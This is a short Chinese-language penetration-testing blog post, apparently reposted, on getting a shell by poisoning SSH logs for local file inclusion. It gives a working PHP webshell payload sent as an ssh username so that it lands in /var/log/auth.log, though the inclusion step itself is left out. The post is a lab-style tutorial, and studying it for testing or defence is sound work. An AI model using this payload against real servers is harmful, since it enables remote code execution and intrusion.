0x01 前言

我们在渗透测试过程中常常会通过文件包含来getshell，一般会包含恶意代码的图片、污染UA或referer等HTTP头从而包含访问日志等等。这里介绍另外一种包含的方法，通过污染SSH日志的方式。

0x02 SSH日志污染

使用测试环境为ubuntu(10.168.33.174)，ssh日志默认是在/var/log/auth.log下，默认其它用户是有read的权限的。
然后我们直接执行ssh ‘<?php system($_GET[c]);?>’@10.168.33.174
可以连接，但是我们不知道有没有这个账户抑或是即便存在也不清楚密码：

然后我们在ubuntu(10.168.33.174)上访问下/var/log/auth.log，发现成功将命令执行的代码写入了：

0x03 本地文件包含

略。

参考来源：http://www.hackingarticles.in/web-server-exploitation-ssh-log-poisoning-lfi/

原文作者：Braid  原文链接：http://www.cnbraid.com/2017/ssh-poison-lfi-shell.html